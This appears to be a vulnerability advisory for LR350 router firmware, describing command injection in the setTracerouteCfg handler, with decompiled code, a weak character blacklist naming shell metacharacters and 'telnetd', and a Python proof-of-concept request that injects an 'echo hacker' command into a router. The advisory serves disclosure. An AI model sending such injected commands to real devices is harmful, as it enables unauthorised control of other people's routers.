LR350 V9.3.5u.6369_B20220309
In the LR350 V9.3.5u.6369_B20220309 firmware has a command injection vulnerability in the setTracerouteCfg function. The Var variable receives the command parameter from a POST request. However, since the user can control the input of command, the doSystem can cause a command injection vulnerability.
int __fastcall set_setTracerouteCfg(int a1)
{
const char *Var; // $s1
int v3; // $v0
int v4; // $s0
char v6[128]; // [sp+18h] [-80h] BYREF
memset(v6, 0, sizeof(v6));
Var = (const char *)websGetVar(a1, "command", "www.baidu.com");
v3 = websGetVar(a1, "num", &byte_431160);
v4 = atoi(v3);
if ( !Validity_check((int)Var) )
{
sprintf(v6, "traceroute -m %d %s&>/var/log/traceRouteLog", v4, Var);
doSystem(v6);
}
setResponse(&word_42F724, "reserv");
return 1;
}
BOOL __fastcall Validity_check(int a1)
{
return strchr(a1, 59)
|| strstr(a1, ".sh")
|| strstr(a1, "iptables")
|| strstr(a1, "telnetd")
|| strchr(a1, 38)
|| strchr(a1, 124)
|| strchr(a1, 96)
|| strchr(a1, 36)
|| strchr(a1, 10) != 0;
}
import requests
url = "<http://192.168.153.2/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"SESSION_ID=2:1768012309:2"}
data = {"command":"echo hacker > /www/123.txt","num":"4","topicurl":"setTracerouteCfg"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)